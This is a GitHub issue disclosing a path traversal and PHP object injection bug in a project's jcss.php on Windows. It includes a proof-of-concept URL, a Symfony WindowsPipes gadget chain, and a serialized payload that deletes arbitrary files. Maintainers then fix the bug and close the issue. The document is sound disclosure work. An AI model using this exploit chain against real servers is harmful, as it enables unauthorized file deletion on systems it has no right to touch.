Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

"jcss.php" file read vulnerability (windows environment) #3237

Closed
Xyntax opened this issue Dec 3, 2016 · 3 comments

Comments

Projects
None yet
2 participants
@Xyntax
Copy link

commented Dec 3, 2016

relative codes in ./jcss.php :

$f = (isset($_GET['f']) ? filter_var($_GET['f'], FILTER_SANITIZE_STRING) : false);

if (!$f) {
    header('HTTP/1.0 404 Not Found');
    exit;
}

// clean $f
$f = preg_replace('`/`', '', $f);

// set full path to the file
$f = $ZConfig['System']['temp'] . '/Theme_cache/' . $f;

if (!is_readable($f)) {
    header('HTTP/1.0 400 Bad request');
    die('ERROR: Requested file not readable.');
}

// child lock
$signingKey = md5(serialize($ZConfig['DBInfo']['databases']['default']));

$contents = file_get_contents($f);
if (!DataUtil::is_serialized($contents, false)) {
    header('HTTP/1.0 500 Internal error');
    die('ERROR: Corrupted file.');
}

$dataArray = unserialize($contents);

On windows platform we can bypass regex filter with ..\
PoC: http://localhost/zikula4/jcss.php?f=..\..\..\..\..\jcss.php

the result of file_get_contents() was brought into unserialize(), when unserialize() is used on user supplied data it often leads to PHP Object Injection.

here we can launch further attacks with __destruct() in ./vendor/symfony/symfony/src/Symfony/Component/Process/Pipes/WindowsPipes.php.

PoC: delete files on windows server.

Add a public func in class WindowsPipes:

public function setattr(){
		$this->files = array('D:\phpStudy\WWW\zikula4\userdata\delete.txt'); // file U wants to delete
		$this->fileHandles = array();	
	}

Serialize an WindowsPipes object and write it to file:

$obj = new WindowsPipes(true,null);
$obj->setattr(); 
file_put_contents('./exp.txt',serialize($obj));

exp.txt

O:44:"Symfony\Component\Process\Pipes\WindowsPipes":8:{s:51:" Symfony\Component\Process\Pipes\WindowsPipes files";a:1:{i:0;s:21:".\userdata\delete.txt";}s:57:" Symfony\Component\Process\Pipes\WindowsPipes fileHandles";a:0:{}s:55:" Symfony\Component\Process\Pipes\WindowsPipes readBytes";a:2:{i:1;i:0;i:2;i:0;}s:59:" Symfony\Component\Process\Pipes\WindowsPipes disableOutput";b:1;s:5:"pipes";a:0:{}s:58:" Symfony\Component\Process\Pipes\AbstractPipes inputBuffer";s:0:"";s:52:" Symfony\Component\Process\Pipes\AbstractPipes input";N;s:54:" Symfony\Component\Process\Pipes\AbstractPipes blocked";b:1;}

Upload exp.txt to ./userdata folder on windows server.
Then request http://localhost/zikula4/jcss.php?f=..\..\..\..\..\userdata\exp.txt, and your target file will be deleted. (D:\phpStudy\WWW\zikula4\userdata\delete.txt in my test).

@Guite Guite added this to the 1.3.11 milestone Dec 3, 2016

@Guite Guite added the Bug label Dec 3, 2016

Guite added a commit that referenced this issue Dec 3, 2016

This was referenced Dec 3, 2016

@Guite

This comment has been minimized.

Copy link
Member

commented Dec 3, 2016

Hi @Xyntax

can you please verify whether #3240 correctly fixes this issue?

@Xyntax

This comment has been minimized.

Copy link
Author

commented Dec 3, 2016

fixed

Guite added a commit that referenced this issue Dec 3, 2016

@Guite Guite closed this in 3ab9614 Dec 3, 2016

@Guite

This comment has been minimized.

Copy link
Member

commented Dec 3, 2016

Fixed in 1.3 and 1.4:

1a8220a
3ab9614

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.